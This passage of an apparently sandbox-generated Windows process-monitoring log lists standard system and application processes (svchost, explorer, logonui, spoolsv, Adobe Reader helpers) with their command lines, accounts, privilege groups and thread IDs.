0x460 Thread: id = 501 os_tid = 0x464 Thread: id = 587 os_tid = 0x5cc Thread: id = 608 os_tid = 0x618 Thread: id = 628 os_tid = 0x670 Thread: id = 630 os_tid = 0x678 Thread: id = 633 os_tid = 0x688 Thread: id = 641 os_tid = 0x6a8 Thread: id = 642 os_tid = 0x6ac Process: id = "32" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x17da0000" os_pid = "0x2e8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x180" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 378 os_tid = 0x2ec Thread: id = 381 os_tid = 0x2f8 Thread: id = 382 os_tid = 0x2fc Thread: id = 383 os_tid = 0x300 Thread: id = 384 os_tid = 0x308 Thread: id = 385 os_tid = 0x30c Thread: id = 388 os_tid = 0x314 Thread: id = 391 os_tid = 0x320 Thread: id = 392 os_tid = 0x324 Thread: id = 393 os_tid = 0x328 Thread: id = 557 os_tid = 0x55c Process: id = "33" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15075000" os_pid = "0x32c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ce52" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 395 os_tid = 0x330 Thread: id = 397 os_tid = 0x338 Thread: id = 402 os_tid = 0x34c Thread: id = 403 os_tid = 0x350 Thread: id = 404 os_tid = 0x354 Thread: id = 406 os_tid = 0x360 Thread: id = 408 os_tid = 0x368 Thread: id = 409 os_tid = 0x36c Thread: id = 413 os_tid = 0x37c Thread: id = 414 os_tid = 0x380 Thread: id = 426 os_tid = 0x3b4 Thread: id = 428 os_tid = 0x3bc Thread: id = 431 os_tid = 0x3cc Thread: id = 432 os_tid = 0x3d0 Thread: id = 434 os_tid = 0x3d8 Thread: id = 435 os_tid = 0x3dc Thread: id = 439 os_tid = 0x3f0 Thread: id = 440 os_tid = 0x3f4 Thread: id = 470 os_tid = 0x354 Thread: id = 475 os_tid = 0x3b8 Thread: id = 490 os_tid = 0x430 Thread: id = 491 os_tid = 0x434 Thread: id = 648 os_tid = 0x6c4 Thread: id = 652 os_tid = 0x6d0 Thread: id = 654 os_tid = 0x6d8 Thread: id = 655 os_tid = 0x6dc Thread: id = 657 os_tid = 0x6e4 Process: id = "34" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1457d000" os_pid = "0x358" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d27e" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 405 os_tid = 0x35c Thread: id = 407 os_tid = 0x364 Thread: id = 410 os_tid = 0x370 Thread: id = 411 os_tid = 0x374 Thread: id = 412 os_tid = 0x378 Thread: id = 415 os_tid = 0x384 Thread: id = 427 os_tid = 0x3b8 Thread: id = 430 os_tid = 0x3c8 Thread: id = 433 os_tid = 0x3d4 Thread: id = 437 os_tid = 0x3e8 Thread: id = 438 os_tid = 0x3ec Thread: id = 442 os_tid = 0x3fc Thread: id = 453 os_tid = 0xf8 Thread: id = 454 os_tid = 0x134 Thread: id = 462 os_tid = 0x154 Thread: id = 463 os_tid = 0x1a4 Thread: id = 507 os_tid = 0x47c Thread: id = 508 os_tid = 0x480 Thread: id = 520 os_tid = 0x490 Thread: id = 521 os_tid = 0x4ac Thread: id = 522 os_tid = 0x414 Thread: id = 523 os_tid = 0x40c Thread: id = 530 os_tid = 0x4b8 Thread: id = 543 os_tid = 0x510 Thread: id = 656 os_tid = 0x6e0 Thread: id = 659 os_tid = 0x6ec Process: id = "35" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x1498e000" os_pid = "0x394" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x2a0" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2e8" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba83" [0xc000000f], "LOCAL" [0x7] Thread: id = 419 os_tid = 0x398 Thread: id = 420 os_tid = 0x39c Thread: id = 422 os_tid = 0x3a4 Thread: id = 424 os_tid = 0x3ac Thread: id = 425 os_tid = 0x3b0 Thread: id = 592 os_tid = 0x5dc Thread: id = 593 os_tid = 0x5e0 Thread: id = 595 os_tid = 0x5e8 Thread: id = 597 os_tid = 0x5f0 Thread: id = 603 os_tid = 0x608 Thread: id = 604 os_tid = 0x620 Process: id = "36" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1478e000" os_pid = "0x3e0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e18e" [0xc000000f], "LOCAL" [0x7] Thread: id = 436 os_tid = 0x3e4 Thread: id = 441 os_tid = 0x3f8 Thread: id = 443 os_tid = 0xc8 Thread: id = 445 os_tid = 0xd0 Thread: id = 446 os_tid = 0x100 Thread: id = 451 os_tid = 0x114 Thread: id = 452 os_tid = 0x10c Thread: id = 488 os_tid = 0x428 Thread: id = 596 os_tid = 0x5ec Process: id = "37" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x12386000" os_pid = "0x138" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x230" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d27e" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 455 os_tid = 0x13c Thread: id = 456 os_tid = 0x130 Thread: id = 457 os_tid = 0x128 Thread: id = 458 os_tid = 0x124 Thread: id = 459 os_tid = 0x140 Thread: id = 460 os_tid = 0x16c Thread: id = 461 os_tid = 0x158 Process: id = "38" image_name = "userinit.exe" filename = "c:\\windows\\system32\\userinit.exe" page_root = "0x1153c000" os_pid = "0x200" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x180" cmd_line = "C:\\Windows\\system32\\userinit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e78c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 464 os_tid = 0x1c0 Thread: id = 591 os_tid = 0x5d8 Thread: id = 594 os_tid = 0x5e4 Process: id = "39" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x1143c000" os_pid = "0x204" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x200" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e78c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 465 os_tid = 0x1fc Thread: id = 466 os_tid = 0x240 Thread: id = 467 os_tid = 0x28c Thread: id = 471 os_tid = 0x360 Thread: id = 472 os_tid = 0x388 Thread: id = 473 os_tid = 0x38c Thread: id = 474 os_tid = 0xfc Thread: id = 476 os_tid = 0x100 Thread: id = 478 os_tid = 0x2dc Thread: id = 509 os_tid = 0x484 Thread: id = 510 os_tid = 0x488 Thread: id = 512 os_tid = 0x48c Thread: id = 513 os_tid = 0x494 Thread: id = 514 os_tid = 0x498 Thread: id = 515 os_tid = 0x49c Thread: id = 516 os_tid = 0x4a0 Thread: id = 517 os_tid = 0x4a4 Thread: id = 518 os_tid = 0x4a8 Thread: id = 524 os_tid = 0x4b0 Thread: id = 525 os_tid = 0x4b4 Thread: id = 526 os_tid = 0x4bc Thread: id = 527 os_tid = 0x4c0 Thread: id = 528 os_tid = 0x4c4 Thread: id = 529 os_tid = 0x4d8 Thread: id = 533 os_tid = 0x4dc Thread: id = 551 os_tid = 0x538 Thread: id = 552 os_tid = 0x53c Thread: id = 562 os_tid = 0x564 Thread: id = 578 os_tid = 0x5b4 Thread: id = 599 os_tid = 0x5f8 Thread: id = 601 os_tid = 0x600 Thread: id = 602 os_tid = 0x604 Thread: id = 607 os_tid = 0x614 Thread: id = 609 os_tid = 0x61c Thread: id = 612 os_tid = 0x62c Thread: id = 613 os_tid = 0x630 Thread: id = 615 os_tid = 0x638 Thread: id = 616 os_tid = 0x63c Thread: id = 621 os_tid = 0x650 Process: id = "40" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x10cea000" os_pid = "0x134" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x32c" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e78c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 479 os_tid = 0x158 Thread: id = 483 os_tid = 0x418 Thread: id = 485 os_tid = 0x41c Thread: id = 486 os_tid = 0x420 Thread: id = 487 os_tid = 0x424 Thread: id = 651 os_tid = 0x6cc Thread: id = 653 os_tid = 0x6d4 Process: id = "41" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x103be000" os_pid = "0x43c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:00010c8d" [0xc000000f], "LOCAL" [0x7] Thread: id = 493 os_tid = 0x440 Thread: id = 494 os_tid = 0x444 Thread: id = 496 os_tid = 0x450 Thread: id = 497 os_tid = 0x454 Thread: id = 498 os_tid = 0x458 Thread: id = 499 os_tid = 0x45c Thread: id = 502 os_tid = 0x468 Thread: id = 503 os_tid = 0x46c Thread: id = 504 os_tid = 0x470 Thread: id = 505 os_tid = 0x474 Thread: id = 506 os_tid = 0x478 Thread: id = 537 os_tid = 0x4ec Thread: id = 541 os_tid = 0x508 Thread: id = 548 os_tid = 0x528 Thread: id = 572 os_tid = 0x590 Thread: id = 623 os_tid = 0x658 Thread: id = 627 os_tid = 0x66c Thread: id = 629 os_tid = 0x674 Thread: id = 631 os_tid = 0x680 Thread: id = 634 os_tid = 0x68c Thread: id = 636 os_tid = 0x694 Thread: id = 643 os_tid = 0x6b0 Thread: id = 644 os_tid = 0x6b4 Thread: id = 645 os_tid = 0x6b8 Thread: id = 646 os_tid = 0x6bc Process: id = "42" image_name = "bcssync.exe" filename = "c:\\program files\\microsoft office\\office14\\bcssync.exe" page_root = "0xd490000" os_pid = "0x4c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x204" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe\" /DelayServices" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e78c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 531 os_tid = 0x4cc Process: id = "43" image_name = "runonce.exe" filename = "c:\\windows\\syswow64\\runonce.exe" page_root = "0xcc9a000" os_pid = "0x4d0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x204" cmd_line = "C:\\Windows\\SysWOW64\\runonce.exe /Run6432" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e78c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 532 os_tid = 0x4d4 Thread: id = 534 os_tid = 0x4e0 Thread: id = 535 os_tid = 0x4e4 Thread: id = 536 os_tid = 0x4e8 Thread: id = 540 os_tid = 0x504 Process: id = "44" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0xb6ca000" os_pid = "0x4fc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:0001642e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 539 os_tid = 0x500 Thread: id = 544 os_tid = 0x514 Thread: id = 545 os_tid = 0x518 Thread: id = 546 os_tid = 0x51c Thread: id = 549 os_tid = 0x52c Thread: id = 553 os_tid = 0x540 Process: id = "45" image_name = "reader_sl.exe" filename = "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe" page_root = "0xcdbd000" os_pid = "0x520" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x4d0" cmd_line = "\"C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e78c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 547 os_tid = 0x524 Thread: id = 566 os_tid = 0x57c Thread: id = 611 os_tid = 0x628 Process: id = "46" image_name = "adobearm.exe" filename = "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe" page_root = "0xc1de000" os_pid = "0x530" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x4d0" cmd_line = "\"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e78c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 550 os_tid = 0x534 Thread: id = 583 os_tid = 0x5bc Thread: id = 586 os_tid = 0x5c8 Process: id = "47" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0xcd32000" os_pid = "0x544" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e78c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 554 os_tid = 0x548 Thread: id = 563 os_tid = 0x56c Thread: id = 568 os_tid = 0x584 Thread: id = 570 os_tid = 0x588 Thread: id = 574 os_tid = 0x598 Thread: id = 575 os_tid = 0x59c Thread: id = 584 os_tid = 0x5c0 Thread: id = 588 os_tid = 0x5d0 Thread: id = 614 os_tid = 0x634 Thread: id = 617 os_tid = 0x640 Thread: id = 619 os_tid = 0x648 Thread: id = 622 os_tid = 0x654 Process: id = "48" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xb937000" os_pid = "0x554" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001887a" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 560 os_tid = 0x558 Thread: id = 565 os_tid = 0x578 Thread: id = 571 os_tid = 0x58c Thread: id = 576 os_tid = 0x5a0 Thread: id = 577 os_tid = 0x5a4 Thread: id = 582 os_tid = 0x5b8 Thread: id = 590 os_tid = 0x5d4 Thread: id = 600 os_tid = 0x5fc Thread: id = 605 os_tid = 0x60c Thread: id = 606 os_tid = 0x610 Thread: id = 618 os_tid = 0x644 Thread: id = 620 os_tid = 0x64c Thread: id = 625 os_tid = 0x664 Thread: id = 632 os_tid = 0x684 Thread: id = 637 os_tid = 0x698 Thread: id = 638 os_tid = 0x69c Thread: id = 639 os_tid = 0x6a0 Thread: id = 640 os_tid = 0x6a4 Process: id = "49" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0xbc3c000" os_pid = "0x570" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x230" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e78c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 564 os_tid = 0x574 Thread: id = 567 os_tid = 0x580 Thread: id = 573 os_tid = 0x594 Thread: id = 579 os_tid = 0x5a8 Thread: id = 580 os_tid = 0x5ac Thread: id = 581 os_tid = 0x5b0 Thread: id = 585 os_tid = 0x5c4